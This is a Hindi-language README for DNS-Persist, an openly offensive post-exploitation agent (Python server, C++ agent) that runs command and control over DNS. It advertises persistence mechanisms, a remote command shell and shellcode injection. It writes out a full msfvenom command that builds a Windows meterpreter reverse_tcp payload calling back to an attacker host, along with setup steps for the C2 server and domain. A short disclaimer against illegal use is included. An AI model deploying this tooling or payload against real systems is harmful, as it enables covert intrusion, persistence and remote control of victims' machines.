
DNS-Persist एक पोस्ट-एक्सप्लॉयटेशन एजेंट है जो कमांड और कंट्रोल के लिए DNS का उपयोग करता है।
DNS-Persist एक पोस्ट-एक्सप्लॉइटेशन एजेंट है जो कमांड और कंट्रोल के लिए DNS का उपयोग करता है। सर्वर-साइड कोड Python में है और एजेंट C++ में लिखा गया है। यह पहला संस्करण है, भविष्य में और अधिक सुविधाएँ और सुधार जोड़े जाएँगे।
0x09AL - https://twitter.com/0x09al
इस सॉफ़्टवेयर का उपयोग अवैध उद्देश्यों के लिए न करें।
यहाँ प्रदान किए गए कोड के किसी भी दुरुपयोग के लिए लेखक कोई ज़िम्मेदारी नहीं लेता है।
DNS C2 पर बहुत सारा बेहतरीन काम मौजूद है, लेकिन मैंने यह सॉफ़्टवेयर पर्सिस्टेंस भाग पर अधिक ध्यान केंद्रित करने के लिए बनाया है। मैं C++ में विशेषज्ञ नहीं हूँ और यह C++ में मेरा पहला "वास्तविक प्रोग्राम" है (इसलिए कुछ शर्मनाक कोड की उम्मीद करें)।
सुविधाओं और सुधारों के बारे में सुझावों का स्वागत है।
इसके दो मुख्य भाग हैं:

इस संस्करण में केवल 3 पर्सिस्टेंस तंत्र हैं। बाद में और जोड़े जाएँगे।
यह संस्करण स्यूडो-इंटरैक्टिव कमांड शेल का समर्थन करता है जिसका उपयोग आप सिस्टम कमांड निष्पादित करने के लिए कर सकते हैं।
यह संस्करण 32-बिट शेलकोड के इंजेक्शन का समर्थन करता है। शेलकोड उसी प्रक्रिया में एक नए थ्रेड में निष्पादित होता है, इसलिए क्रैश होने वाला या अमान्य शेलकोड एजेंट को भी क्रैश कर देगा। शेलकोड में NULL बाइट्स से बचें।
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=port EXITFUNC=thread -b "\x00" -f hex -o /tmp/shellcode.hex
pip install dnslib
git clone https://github.com/0x09AL/DNS-Persist
python server.py
डिफ़ॉल्ट रूप से पोर्ट 53 पर एक DNS सर्वर शुरू किया जाएगा। आप इसे server.py फ़ाइल में बदल सकते हैं।
मैंने एजेंट को कोड करने के लिए Visual Studio 2010 का उपयोग किया है, इसलिए इसे इम्पोर्ट करना और कंपाइल करना काफी आसान होना चाहिए।
अपने डोमेन नाम से मेल खाने के लिए Declarations.h में DOMAIN_NAME वेरिएबल को बदलना याद रखें।
डोमेन के नेमसर्वर DNS-Persist के IP पते की ओर इंगित करने चाहिए।
#define DOMAIN_NAME "example.com"



